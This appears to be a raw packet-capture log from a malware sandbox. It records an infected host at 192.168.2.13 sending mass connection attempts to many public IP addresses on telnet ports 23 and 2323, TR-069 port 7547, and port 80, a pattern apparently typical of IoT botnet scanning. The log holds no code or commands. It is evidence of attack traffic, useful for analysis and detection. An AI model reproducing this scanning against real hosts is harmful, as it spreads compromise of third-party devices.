                                          Nov 7, 2024 11:58:00.761334896 CET454087547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:58:00.761341095 CET517887547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:58:00.761349916 CET535647547192.168.2.13173.66.213.27
                                          Nov 7, 2024 11:58:00.761358023 CET595887547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:58:00.761358023 CET364967547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:58:00.761362076 CET376427547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:58:00.761365891 CET550687547192.168.2.13173.94.159.118
                                          Nov 7, 2024 11:58:00.761370897 CET599447547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:58:00.761370897 CET447007547192.168.2.13207.191.93.18
                                          Nov 7, 2024 11:58:00.761379957 CET427467547192.168.2.13200.220.184.47
                                          Nov 7, 2024 11:58:00.761379957 CET589427547192.168.2.13170.246.41.239
                                          Nov 7, 2024 11:58:00.761380911 CET338507547192.168.2.13119.15.235.117
                                          Nov 7, 2024 11:58:00.761380911 CET340687547192.168.2.1360.50.40.24
                                          Nov 7, 2024 11:58:00.761387110 CET561487547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:58:00.761388063 CET575107547192.168.2.13111.181.107.200
                                          Nov 7, 2024 11:58:00.761389017 CET441907547192.168.2.13151.92.176.195
                                          Nov 7, 2024 11:58:00.761394024 CET455707547192.168.2.1363.214.81.242
                                          Nov 7, 2024 11:58:00.761394978 CET422627547192.168.2.13183.59.129.150
                                          Nov 7, 2024 11:58:00.761394024 CET509767547192.168.2.13157.4.219.114
                                          Nov 7, 2024 11:58:00.761405945 CET368747547192.168.2.1354.8.114.143
                                          Nov 7, 2024 11:58:00.766625881 CET75474407823.91.39.87192.168.2.13
                                          Nov 7, 2024 11:58:00.766671896 CET440787547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:58:00.766690016 CET440787547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:58:00.766690016 CET440787547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:58:00.766707897 CET754744884217.63.48.206192.168.2.13
                                          Nov 7, 2024 11:58:00.766765118 CET448847547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:58:00.766765118 CET448847547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:58:00.766765118 CET448847547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:58:00.772011042 CET75474407823.91.39.87192.168.2.13
                                          Nov 7, 2024 11:58:00.772413015 CET754744884217.63.48.206192.168.2.13
                                          Nov 7, 2024 11:58:00.784488916 CET754758820141.151.90.91192.168.2.13
                                          Nov 7, 2024 11:58:00.788362980 CET754758918141.151.90.91192.168.2.13
                                          Nov 7, 2024 11:58:00.812671900 CET754744884217.63.48.206192.168.2.13
                                          Nov 7, 2024 11:58:00.812683105 CET75474407823.91.39.87192.168.2.13
                                          Nov 7, 2024 11:58:01.022290945 CET2359258128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:58:01.022432089 CET5925823192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:58:01.023062944 CET5928223192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:58:01.027482033 CET2359258128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:58:01.029125929 CET2359282128.52.175.122192.168.2.13
                                          Nov 7, 2024 11:58:01.029217005 CET5928223192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:58:01.248286009 CET233718292.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:01.248555899 CET3718223192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:01.249150038 CET3720623192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:01.253465891 CET233718292.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:01.253985882 CET233720692.13.69.124192.168.2.13
                                          Nov 7, 2024 11:58:01.254069090 CET3720623192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:58:01.356568098 CET234518860.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:01.356726885 CET4518823192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:01.359200954 CET4519623192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:01.361416101 CET331223192.168.2.13170.193.246.59
                                          Nov 7, 2024 11:58:01.361416101 CET331223192.168.2.1372.227.14.126
                                          Nov 7, 2024 11:58:01.361423016 CET331223192.168.2.13143.28.210.25
                                          Nov 7, 2024 11:58:01.361422062 CET33122323192.168.2.1338.85.211.85
                                          Nov 7, 2024 11:58:01.361422062 CET331223192.168.2.13182.9.155.227
                                          Nov 7, 2024 11:58:01.361422062 CET331223192.168.2.1371.243.148.75
                                          Nov 7, 2024 11:58:01.361460924 CET331223192.168.2.13220.143.58.188
                                          Nov 7, 2024 11:58:01.361460924 CET331223192.168.2.13220.158.61.65
                                          Nov 7, 2024 11:58:01.361460924 CET331223192.168.2.13116.60.45.151
                                          Nov 7, 2024 11:58:01.361460924 CET331223192.168.2.1360.87.203.74
                                          Nov 7, 2024 11:58:01.361459970 CET331223192.168.2.1360.66.37.253
                                          Nov 7, 2024 11:58:01.361460924 CET331223192.168.2.13147.208.23.121
                                          Nov 7, 2024 11:58:01.361459970 CET331223192.168.2.1320.196.118.129
                                          Nov 7, 2024 11:58:01.361466885 CET331223192.168.2.13141.32.204.216
                                          Nov 7, 2024 11:58:01.361459017 CET331223192.168.2.13148.162.5.132
                                          Nov 7, 2024 11:58:01.361466885 CET331223192.168.2.1364.124.205.224
                                          Nov 7, 2024 11:58:01.361459017 CET331223192.168.2.13184.1.197.107
                                          Nov 7, 2024 11:58:01.361459017 CET331223192.168.2.1334.183.241.67
                                          Nov 7, 2024 11:58:01.361466885 CET331223192.168.2.13168.172.104.164
                                          Nov 7, 2024 11:58:01.361470938 CET331223192.168.2.13158.208.96.254
                                          Nov 7, 2024 11:58:01.361459017 CET33122323192.168.2.1350.37.185.47
                                          Nov 7, 2024 11:58:01.361471891 CET331223192.168.2.1351.237.42.18
                                          Nov 7, 2024 11:58:01.361470938 CET331223192.168.2.13175.178.158.12
                                          Nov 7, 2024 11:58:01.361471891 CET331223192.168.2.132.93.84.42
                                          Nov 7, 2024 11:58:01.361470938 CET33122323192.168.2.13106.211.114.182
                                          Nov 7, 2024 11:58:01.361471891 CET331223192.168.2.13163.80.118.210
                                          Nov 7, 2024 11:58:01.361459017 CET331223192.168.2.13158.16.3.52
                                          Nov 7, 2024 11:58:01.361470938 CET331223192.168.2.1334.131.58.4
                                          Nov 7, 2024 11:58:01.361471891 CET331223192.168.2.1360.69.119.113
                                          Nov 7, 2024 11:58:01.361459017 CET331223192.168.2.13191.250.235.43
                                          Nov 7, 2024 11:58:01.361491919 CET331223192.168.2.13170.43.95.128
                                          Nov 7, 2024 11:58:01.361494064 CET331223192.168.2.13163.43.19.107
                                          Nov 7, 2024 11:58:01.361494064 CET331223192.168.2.1398.179.150.8
                                          Nov 7, 2024 11:58:01.361494064 CET331223192.168.2.13164.121.199.69
                                          Nov 7, 2024 11:58:01.361504078 CET331223192.168.2.13164.13.215.8
                                          Nov 7, 2024 11:58:01.361504078 CET331223192.168.2.13223.185.237.107
                                          Nov 7, 2024 11:58:01.361504078 CET331223192.168.2.13217.249.41.230
                                          Nov 7, 2024 11:58:01.361506939 CET331223192.168.2.13203.213.243.217
                                          Nov 7, 2024 11:58:01.361515999 CET331223192.168.2.1339.185.171.69
                                          Nov 7, 2024 11:58:01.361515999 CET331223192.168.2.1359.200.187.47
                                          Nov 7, 2024 11:58:01.361515999 CET331223192.168.2.1392.202.81.135
                                          Nov 7, 2024 11:58:01.361520052 CET33122323192.168.2.13183.22.226.94
                                          Nov 7, 2024 11:58:01.361522913 CET331223192.168.2.13111.201.1.108
                                          Nov 7, 2024 11:58:01.361527920 CET33122323192.168.2.1384.79.84.79
                                          Nov 7, 2024 11:58:01.361527920 CET331223192.168.2.1361.142.44.219
                                          Nov 7, 2024 11:58:01.361541033 CET331223192.168.2.13198.248.82.41
                                          Nov 7, 2024 11:58:01.361541033 CET331223192.168.2.13115.210.187.233
                                          Nov 7, 2024 11:58:01.361541986 CET331223192.168.2.1395.182.224.42
                                          Nov 7, 2024 11:58:01.361543894 CET331223192.168.2.1354.206.157.209
                                          Nov 7, 2024 11:58:01.361543894 CET331223192.168.2.1386.65.200.198
                                          Nov 7, 2024 11:58:01.361545086 CET331223192.168.2.1388.223.230.44
                                          Nov 7, 2024 11:58:01.361548901 CET331223192.168.2.13166.146.171.251
                                          Nov 7, 2024 11:58:01.361548901 CET33122323192.168.2.1369.48.159.179
                                          Nov 7, 2024 11:58:01.361548901 CET331223192.168.2.13108.37.177.135
                                          Nov 7, 2024 11:58:01.361548901 CET33122323192.168.2.13174.64.74.45
                                          Nov 7, 2024 11:58:01.361557007 CET331223192.168.2.1341.68.245.48
                                          Nov 7, 2024 11:58:01.361561060 CET331223192.168.2.1375.21.106.76
                                          Nov 7, 2024 11:58:01.361561060 CET331223192.168.2.13190.88.172.59
                                          Nov 7, 2024 11:58:01.361567020 CET331223192.168.2.1393.27.1.137
                                          Nov 7, 2024 11:58:01.361567020 CET331223192.168.2.1386.132.34.249
                                          Nov 7, 2024 11:58:01.361567020 CET331223192.168.2.13134.24.14.207
                                          Nov 7, 2024 11:58:01.361567020 CET331223192.168.2.1371.145.136.40
                                          Nov 7, 2024 11:58:01.361572981 CET331223192.168.2.13155.180.109.152
                                          Nov 7, 2024 11:58:01.361574888 CET331223192.168.2.13135.124.41.220
                                          Nov 7, 2024 11:58:01.361574888 CET331223192.168.2.1334.87.6.104
                                          Nov 7, 2024 11:58:01.361584902 CET331223192.168.2.13143.219.209.171
                                          Nov 7, 2024 11:58:01.361586094 CET331223192.168.2.1314.235.30.244
                                          Nov 7, 2024 11:58:01.361586094 CET331223192.168.2.13108.252.189.220
                                          Nov 7, 2024 11:58:01.361586094 CET331223192.168.2.13100.211.215.118
                                          Nov 7, 2024 11:58:01.361591101 CET331223192.168.2.1395.169.177.135
                                          Nov 7, 2024 11:58:01.361599922 CET33122323192.168.2.13211.49.135.47
                                          Nov 7, 2024 11:58:01.361602068 CET331223192.168.2.1332.50.149.183
                                          Nov 7, 2024 11:58:01.361603022 CET331223192.168.2.1382.126.210.61
                                          Nov 7, 2024 11:58:01.361603022 CET331223192.168.2.13191.180.194.142
                                          Nov 7, 2024 11:58:01.361603022 CET331223192.168.2.13199.12.98.101
                                          Nov 7, 2024 11:58:01.361603022 CET331223192.168.2.13142.240.103.78
                                          Nov 7, 2024 11:58:01.361607075 CET331223192.168.2.13194.243.109.171
                                          Nov 7, 2024 11:58:01.361617088 CET331223192.168.2.13153.120.145.154
                                          Nov 7, 2024 11:58:01.361617088 CET33122323192.168.2.1369.242.238.33
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.13186.8.174.156
                                          Nov 7, 2024 11:58:01.361617088 CET331223192.168.2.13102.137.194.206
                                          Nov 7, 2024 11:58:01.361617088 CET331223192.168.2.13172.255.1.98
                                          Nov 7, 2024 11:58:01.361618996 CET331223192.168.2.13172.9.210.247
                                          Nov 7, 2024 11:58:01.361620903 CET331223192.168.2.1368.212.196.146
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.13125.119.16.252
                                          Nov 7, 2024 11:58:01.361620903 CET331223192.168.2.13181.206.101.195
                                          Nov 7, 2024 11:58:01.361620903 CET331223192.168.2.13179.68.74.191
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.13118.46.63.152
                                          Nov 7, 2024 11:58:01.361624002 CET33122323192.168.2.1339.135.24.157
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.13126.55.47.214
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.13107.223.150.200
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.1361.48.80.131
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.13132.226.177.90
                                          Nov 7, 2024 11:58:01.361618042 CET331223192.168.2.131.91.52.176
                                          Nov 7, 2024 11:58:01.361618042 CET33122323192.168.2.1381.140.224.38
                                          Nov 7, 2024 11:58:01.361628056 CET331223192.168.2.13144.127.78.10
                                          Nov 7, 2024 11:58:01.361637115 CET331223192.168.2.1312.213.111.84
                                          Nov 7, 2024 11:58:01.361639977 CET331223192.168.2.1312.177.247.205
                                          Nov 7, 2024 11:58:01.361639977 CET331223192.168.2.13107.0.101.133
                                          Nov 7, 2024 11:58:01.361639977 CET331223192.168.2.13106.147.75.140
                                          Nov 7, 2024 11:58:01.361644983 CET331223192.168.2.13199.96.185.216
                                          Nov 7, 2024 11:58:01.361644983 CET331223192.168.2.13111.189.97.189
                                          Nov 7, 2024 11:58:01.361644983 CET331223192.168.2.13135.91.132.65
                                          Nov 7, 2024 11:58:01.361644983 CET331223192.168.2.13164.224.252.205
                                          Nov 7, 2024 11:58:01.361644983 CET331223192.168.2.1331.21.93.253
                                          Nov 7, 2024 11:58:01.361644983 CET331223192.168.2.1327.93.61.61
                                          Nov 7, 2024 11:58:01.361670971 CET331223192.168.2.13160.73.97.172
                                          Nov 7, 2024 11:58:01.361689091 CET331223192.168.2.13155.46.24.49
                                          Nov 7, 2024 11:58:01.361690044 CET331223192.168.2.1334.222.85.101
                                          Nov 7, 2024 11:58:01.361690998 CET331223192.168.2.1313.151.91.10
                                          Nov 7, 2024 11:58:01.361690044 CET331223192.168.2.1392.121.173.105
                                          Nov 7, 2024 11:58:01.361690998 CET331223192.168.2.13163.69.233.5
                                          Nov 7, 2024 11:58:01.361696005 CET331223192.168.2.13200.245.247.115
                                          Nov 7, 2024 11:58:01.361728907 CET33122323192.168.2.1392.64.220.207
                                          Nov 7, 2024 11:58:01.361728907 CET331223192.168.2.13132.125.121.157
                                          Nov 7, 2024 11:58:01.361728907 CET331223192.168.2.13107.240.84.165
                                          Nov 7, 2024 11:58:01.361732960 CET331223192.168.2.13107.137.195.4
                                          Nov 7, 2024 11:58:01.361732960 CET331223192.168.2.1387.60.98.115
                                          Nov 7, 2024 11:58:01.361733913 CET331223192.168.2.13102.164.236.95
                                          Nov 7, 2024 11:58:01.361735106 CET331223192.168.2.1366.170.119.143
                                          Nov 7, 2024 11:58:01.361733913 CET331223192.168.2.1338.245.19.96
                                          Nov 7, 2024 11:58:01.361732960 CET331223192.168.2.13161.64.234.229
                                          Nov 7, 2024 11:58:01.361733913 CET33122323192.168.2.1343.215.147.0
                                          Nov 7, 2024 11:58:01.361732960 CET331223192.168.2.1357.188.214.131
                                          Nov 7, 2024 11:58:01.361740112 CET331223192.168.2.13219.58.173.71
                                          Nov 7, 2024 11:58:01.361735106 CET331223192.168.2.1341.194.4.210
                                          Nov 7, 2024 11:58:01.361740112 CET331223192.168.2.1392.164.250.72
                                          Nov 7, 2024 11:58:01.361735106 CET331223192.168.2.13147.253.126.33
                                          Nov 7, 2024 11:58:01.361732960 CET331223192.168.2.13101.189.85.139
                                          Nov 7, 2024 11:58:01.361733913 CET331223192.168.2.1372.189.188.63
                                          Nov 7, 2024 11:58:01.361742973 CET33122323192.168.2.13146.81.202.214
                                          Nov 7, 2024 11:58:01.361732960 CET331223192.168.2.13174.207.170.93
                                          Nov 7, 2024 11:58:01.361742973 CET331223192.168.2.13122.44.22.19
                                          Nov 7, 2024 11:58:01.361742973 CET331223192.168.2.13197.24.168.141
                                          Nov 7, 2024 11:58:01.361738920 CET331223192.168.2.1376.212.77.175
                                          Nov 7, 2024 11:58:01.361742973 CET331223192.168.2.13129.85.73.247
                                          Nov 7, 2024 11:58:01.361738920 CET33122323192.168.2.13180.219.245.30
                                          Nov 7, 2024 11:58:01.361738920 CET331223192.168.2.13139.113.120.108
                                          Nov 7, 2024 11:58:01.361738920 CET331223192.168.2.13156.40.239.42
                                          Nov 7, 2024 11:58:01.361738920 CET331223192.168.2.13185.158.55.208
                                          Nov 7, 2024 11:58:01.361758947 CET331223192.168.2.13161.232.156.79
                                          Nov 7, 2024 11:58:01.361764908 CET331223192.168.2.1346.134.176.172
                                          Nov 7, 2024 11:58:01.361764908 CET331223192.168.2.13217.58.13.79
                                          Nov 7, 2024 11:58:01.361767054 CET331223192.168.2.13121.75.205.65
                                          Nov 7, 2024 11:58:01.361767054 CET331223192.168.2.13223.54.91.57
                                          Nov 7, 2024 11:58:01.361768007 CET331223192.168.2.13198.237.199.24
                                          Nov 7, 2024 11:58:01.361768007 CET331223192.168.2.13145.7.240.143
                                          Nov 7, 2024 11:58:01.361768007 CET331223192.168.2.13180.213.117.252
                                          Nov 7, 2024 11:58:01.361768961 CET331223192.168.2.139.52.133.245
                                          Nov 7, 2024 11:58:01.361768007 CET33122323192.168.2.1336.3.69.40
                                          Nov 7, 2024 11:58:01.361768961 CET331223192.168.2.1364.237.215.218
                                          Nov 7, 2024 11:58:01.361769915 CET331223192.168.2.1351.235.195.207
                                          Nov 7, 2024 11:58:01.361768961 CET331223192.168.2.13217.43.66.110
                                          Nov 7, 2024 11:58:01.361769915 CET331223192.168.2.13158.210.144.141
                                          Nov 7, 2024 11:58:01.361769915 CET331223192.168.2.13138.164.72.207
                                          Nov 7, 2024 11:58:01.361769915 CET331223192.168.2.13155.251.134.236
                                          Nov 7, 2024 11:58:01.361774921 CET331223192.168.2.1349.247.118.150
                                          Nov 7, 2024 11:58:01.361773968 CET234518860.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:01.361774921 CET331223192.168.2.1394.143.171.135
                                          Nov 7, 2024 11:58:01.361774921 CET331223192.168.2.13189.116.162.30
                                          Nov 7, 2024 11:58:01.361774921 CET331223192.168.2.13187.225.228.30
                                          Nov 7, 2024 11:58:01.364216089 CET234519660.114.104.239192.168.2.13
                                          Nov 7, 2024 11:58:01.364370108 CET4519623192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:58:01.366605043 CET233312170.193.246.59192.168.2.13
                                          Nov 7, 2024 11:58:01.366635084 CET23331272.227.14.126192.168.2.13
                                          Nov 7, 2024 11:58:01.366647005 CET233312143.28.210.25192.168.2.13
                                          Nov 7, 2024 11:58:01.366650105 CET331223192.168.2.13170.193.246.59
                                          Nov 7, 2024 11:58:01.366657019 CET2323331238.85.211.85192.168.2.13
                                          Nov 7, 2024 11:58:01.366667986 CET233312182.9.155.227192.168.2.13
                                          Nov 7, 2024 11:58:01.366671085 CET331223192.168.2.1372.227.14.126
                                          Nov 7, 2024 11:58:01.366677046 CET331223192.168.2.13143.28.210.25
                                          Nov 7, 2024 11:58:01.366678953 CET23331271.243.148.75192.168.2.13
                                          Nov 7, 2024 11:58:01.366713047 CET331223192.168.2.13182.9.155.227
                                          Nov 7, 2024 11:58:01.366754055 CET233312220.143.58.188192.168.2.13
                                          Nov 7, 2024 11:58:01.366765022 CET233312116.60.45.151192.168.2.13
                                          Nov 7, 2024 11:58:01.366775990 CET233312220.158.61.65192.168.2.13
                                          Nov 7, 2024 11:58:01.366780996 CET331223192.168.2.1371.243.148.75
                                          Nov 7, 2024 11:58:01.366780996 CET33122323192.168.2.1338.85.211.85
                                          Nov 7, 2024 11:58:01.366786003 CET23331260.87.203.74192.168.2.13
                                          Nov 7, 2024 11:58:01.366797924 CET233312147.208.23.121192.168.2.13
                                          Nov 7, 2024 11:58:01.366807938 CET233312141.32.204.216192.168.2.13
                                          Nov 7, 2024 11:58:01.366813898 CET331223192.168.2.13220.158.61.65
                                          Nov 7, 2024 11:58:01.366817951 CET23331251.237.42.18192.168.2.13
                                          Nov 7, 2024 11:58:01.366830111 CET23331260.66.37.253192.168.2.13
                                          Nov 7, 2024 11:58:01.366839886 CET23331264.124.205.224192.168.2.13
                                          Nov 7, 2024 11:58:01.366842985 CET331223192.168.2.13220.143.58.188
                                          Nov 7, 2024 11:58:01.366842985 CET331223192.168.2.1360.87.203.74
                                          Nov 7, 2024 11:58:01.366842985 CET331223192.168.2.13116.60.45.151
                                          Nov 7, 2024 11:58:01.366849899 CET23331220.196.118.129192.168.2.13
                                          Nov 7, 2024 11:58:01.366854906 CET331223192.168.2.13141.32.204.216
                                          Nov 7, 2024 11:58:01.366856098 CET331223192.168.2.13147.208.23.121
                                          Nov 7, 2024 11:58:01.366859913 CET331223192.168.2.1351.237.42.18
                                          Nov 7, 2024 11:58:01.366862059 CET233312158.208.96.254192.168.2.13
                                          Nov 7, 2024 11:58:01.366872072 CET233312168.172.104.164192.168.2.13
                                          Nov 7, 2024 11:58:01.366882086 CET233312163.43.19.107192.168.2.13
                                          Nov 7, 2024 11:58:01.366888046 CET331223192.168.2.1360.66.37.253
                                          Nov 7, 2024 11:58:01.366908073 CET331223192.168.2.13158.208.96.254
                                          Nov 7, 2024 11:58:01.366926908 CET331223192.168.2.1364.124.205.224
                                          Nov 7, 2024 11:58:01.366926908 CET331223192.168.2.13168.172.104.164
                                          Nov 7, 2024 11:58:01.366939068 CET331223192.168.2.13163.43.19.107
                                          Nov 7, 2024 11:58:01.366976023 CET331223192.168.2.1320.196.118.129
                                          Nov 7, 2024 11:58:01.367043972 CET233312170.43.95.128192.168.2.13
                                          Nov 7, 2024 11:58:01.367054939 CET23331298.179.150.8192.168.2.13
                                          Nov 7, 2024 11:58:01.367064953 CET233312203.213.243.217192.168.2.13
                                          Nov 7, 2024 11:58:01.367079020 CET233312175.178.158.12192.168.2.13
                                          Nov 7, 2024 11:58:01.367083073 CET331223192.168.2.13170.43.95.128
                                          Nov 7, 2024 11:58:01.367094040 CET233312164.121.199.69192.168.2.13
                                          Nov 7, 2024 11:58:01.367105007 CET23233312106.211.114.182192.168.2.13
                                          Nov 7, 2024 11:58:01.367105961 CET331223192.168.2.1398.179.150.8
                                          Nov 7, 2024 11:58:01.367114067 CET233312148.162.5.132192.168.2.13
                                          Nov 7, 2024 11:58:01.367124081 CET233312164.13.215.8192.168.2.13
                                          Nov 7, 2024 11:58:01.367136002 CET23331234.131.58.4192.168.2.13
                                          Nov 7, 2024 11:58:01.367141008 CET331223192.168.2.13203.213.243.217
                                          Nov 7, 2024 11:58:01.367142916 CET331223192.168.2.13164.121.199.69
                                          Nov 7, 2024 11:58:01.367146015 CET2333122.93.84.42192.168.2.13
                                          Nov 7, 2024 11:58:01.367156029 CET233312184.1.197.107192.168.2.13
                                          Nov 7, 2024 11:58:01.367156982 CET331223192.168.2.13175.178.158.12
                                          Nov 7, 2024 11:58:01.367156982 CET33122323192.168.2.13106.211.114.182
                                          Nov 7, 2024 11:58:01.367162943 CET331223192.168.2.13164.13.215.8
                                          Nov 7, 2024 11:58:01.367166996 CET233312223.185.237.107192.168.2.13
                                          Nov 7, 2024 11:58:01.367168903 CET331223192.168.2.1334.131.58.4
                                          Nov 7, 2024 11:58:01.367172003 CET331223192.168.2.132.93.84.42
                                          Nov 7, 2024 11:58:01.367177010 CET23331239.185.171.69192.168.2.13
                                          Nov 7, 2024 11:58:01.367187977 CET233312217.249.41.230192.168.2.13
                                          Nov 7, 2024 11:58:01.367233038 CET331223192.168.2.1339.185.171.69
                                          Nov 7, 2024 11:58:01.367233038 CET331223192.168.2.13217.249.41.230
                                          Nov 7, 2024 11:58:01.367233038 CET331223192.168.2.13223.185.237.107
                                          Nov 7, 2024 11:58:01.367300034 CET331223192.168.2.13148.162.5.132
                                          Nov 7, 2024 11:58:01.367300034 CET331223192.168.2.13184.1.197.107
                                          Nov 7, 2024 11:58:01.367466927 CET23233312183.22.226.94192.168.2.13
                                          Nov 7, 2024 11:58:01.367476940 CET233312163.80.118.210192.168.2.13
                                          Nov 7, 2024 11:58:01.367486954 CET233312111.201.1.108192.168.2.13
                                          Nov 7, 2024 11:58:01.367496967 CET23331260.69.119.113192.168.2.13
                                          Nov 7, 2024 11:58:01.367506981 CET23331259.200.187.47192.168.2.13
                                          Nov 7, 2024 11:58:01.367507935 CET33122323192.168.2.13183.22.226.94
                                          Nov 7, 2024 11:58:01.367517948 CET2323331284.79.84.79192.168.2.13
                                          Nov 7, 2024 11:58:01.367527962 CET233312198.248.82.41192.168.2.13
                                          Nov 7, 2024 11:58:01.367533922 CET331223192.168.2.1360.69.119.113
                                          Nov 7, 2024 11:58:01.367536068 CET331223192.168.2.13111.201.1.108
                                          Nov 7, 2024 11:58:01.367538929 CET23331292.202.81.135192.168.2.13
                                          Nov 7, 2024 11:58:01.367548943 CET233312115.210.187.233192.168.2.13
                                          Nov 7, 2024 11:58:01.367558956 CET23331261.142.44.219192.168.2.13
                                          Nov 7, 2024 11:58:01.367559910 CET331223192.168.2.13163.80.118.210
                                          Nov 7, 2024 11:58:01.367563963 CET331223192.168.2.1359.200.187.47
                                          Nov 7, 2024 11:58:01.367566109 CET33122323192.168.2.1384.79.84.79
                                          Nov 7, 2024 11:58:01.367569923 CET23331241.68.245.48192.168.2.13
                                          Nov 7, 2024 11:58:01.367569923 CET331223192.168.2.13198.248.82.41
                                          Nov 7, 2024 11:58:01.367579937 CET23331254.206.157.209192.168.2.13
                                          Nov 7, 2024 11:58:01.367589951 CET23331295.182.224.42192.168.2.13
                                          Nov 7, 2024 11:58:01.367590904 CET331223192.168.2.1392.202.81.135
                                          Nov 7, 2024 11:58:01.367600918 CET233312166.146.171.251192.168.2.13
                                          Nov 7, 2024 11:58:01.367610931 CET23331286.65.200.198192.168.2.13
                                          Nov 7, 2024 11:58:01.367621899 CET23331275.21.106.76192.168.2.13
                                          Nov 7, 2024 11:58:01.367630959 CET2323331269.48.159.179192.168.2.13
                                          Nov 7, 2024 11:58:01.367631912 CET331223192.168.2.1395.182.224.42
                                          Nov 7, 2024 11:58:01.367638111 CET331223192.168.2.1341.68.245.48
                                          Nov 7, 2024 11:58:01.367641926 CET23331288.223.230.44192.168.2.13
                                          Nov 7, 2024 11:58:01.367643118 CET331223192.168.2.13166.146.171.251
                                          Nov 7, 2024 11:58:01.367651939 CET233312108.37.177.135192.168.2.13
                                          Nov 7, 2024 11:58:01.367659092 CET331223192.168.2.1361.142.44.219
                                          Nov 7, 2024 11:58:01.367661953 CET23233312174.64.74.45192.168.2.13
                                          Nov 7, 2024 11:58:01.367672920 CET23331234.183.241.67192.168.2.13
                                          Nov 7, 2024 11:58:01.367680073 CET331223192.168.2.1354.206.157.209
                                          Nov 7, 2024 11:58:01.367680073 CET331223192.168.2.1388.223.230.44
                                          Nov 7, 2024 11:58:01.367683887 CET2323331250.37.185.47192.168.2.13
                                          Nov 7, 2024 11:58:01.367686033 CET33122323192.168.2.1369.48.159.179
                                          Nov 7, 2024 11:58:01.367691040 CET233312158.16.3.52192.168.2.13
                                          Nov 7, 2024 11:58:01.367697001 CET233312191.250.235.43192.168.2.13
                                          Nov 7, 2024 11:58:01.367778063 CET331223192.168.2.13108.37.177.135
                                          Nov 7, 2024 11:58:01.367777109 CET331223192.168.2.13115.210.187.233
                                          Nov 7, 2024 11:58:01.367777109 CET331223192.168.2.1375.21.106.76
                                          Nov 7, 2024 11:58:01.367808104 CET33122323192.168.2.13174.64.74.45
                                          Nov 7, 2024 11:58:01.367820024 CET331223192.168.2.1334.183.241.67
                                          Nov 7, 2024 11:58:01.367820024 CET331223192.168.2.13158.16.3.52
                                          Nov 7, 2024 11:58:01.367820024 CET33122323192.168.2.1350.37.185.47
                                          Nov 7, 2024 11:58:01.368127108 CET331223192.168.2.1386.65.200.198
                                          Nov 7, 2024 11:58:01.368129015 CET331223192.168.2.13191.250.235.43
                                          Nov 7, 2024 11:58:01.399723053 CET254480192.168.2.13112.58.59.247
                                          Nov 7, 2024 11:58:01.399734974 CET254480192.168.2.13112.15.53.45
                                          Nov 7, 2024 11:58:01.399734974 CET254480192.168.2.13112.154.103.245
                                          Nov 7, 2024 11:58:01.399744034 CET254480192.168.2.13112.114.191.121
                                          Nov 7, 2024 11:58:01.399744987 CET254480192.168.2.13112.181.239.74
                                          Nov 7, 2024 11:58:01.399744987 CET254480192.168.2.13112.142.94.130
                                          Nov 7, 2024 11:58:01.399749994 CET254480192.168.2.13112.94.168.97
                                          Nov 7, 2024 11:58:01.399753094 CET254480192.168.2.13112.33.132.139
                                          Nov 7, 2024 11:58:01.399758101 CET254480192.168.2.13112.95.132.88
                                          Nov 7, 2024 11:58:01.399769068 CET254480192.168.2.13112.28.234.155
                                          Nov 7, 2024 11:58:01.399769068 CET254480192.168.2.13112.29.160.218
                                          Nov 7, 2024 11:58:01.399775982 CET254480192.168.2.13112.126.202.172
                                          Nov 7, 2024 11:58:01.399780989 CET254480192.168.2.13112.156.8.62
                                          Nov 7, 2024 11:58:01.399780989 CET254480192.168.2.13112.5.113.38
                                          Nov 7, 2024 11:58:01.399785042 CET254480192.168.2.13112.116.109.101
                                          Nov 7, 2024 11:58:01.399785995 CET254480192.168.2.13112.81.56.29
                                          Nov 7, 2024 11:58:01.399791002 CET254480192.168.2.13112.241.115.182
                                          Nov 7, 2024 11:58:01.399791002 CET254480192.168.2.13112.72.93.90
                                          Nov 7, 2024 11:58:01.399791002 CET254480192.168.2.13112.44.186.219
                                          Nov 7, 2024 11:58:01.399795055 CET254480192.168.2.13112.213.153.201
                                          Nov 7, 2024 11:58:01.399795055 CET254480192.168.2.13112.33.76.29
                                          Nov 7, 2024 11:58:01.399795055 CET254480192.168.2.13112.25.76.141
                                          Nov 7, 2024 11:58:01.399800062 CET254480192.168.2.13112.165.149.155
                                          Nov 7, 2024 11:58:01.399806976 CET254480192.168.2.13112.144.197.115
                                          Nov 7, 2024 11:58:01.399810076 CET254480192.168.2.13112.6.166.41
                                          Nov 7, 2024 11:58:01.399811029 CET254480192.168.2.13112.203.126.185
                                          Nov 7, 2024 11:58:01.399815083 CET254480192.168.2.13112.86.5.13
                                          Nov 7, 2024 11:58:01.399858952 CET254480192.168.2.13112.202.127.222
                                          Nov 7, 2024 11:58:01.399859905 CET254480192.168.2.13112.239.21.196
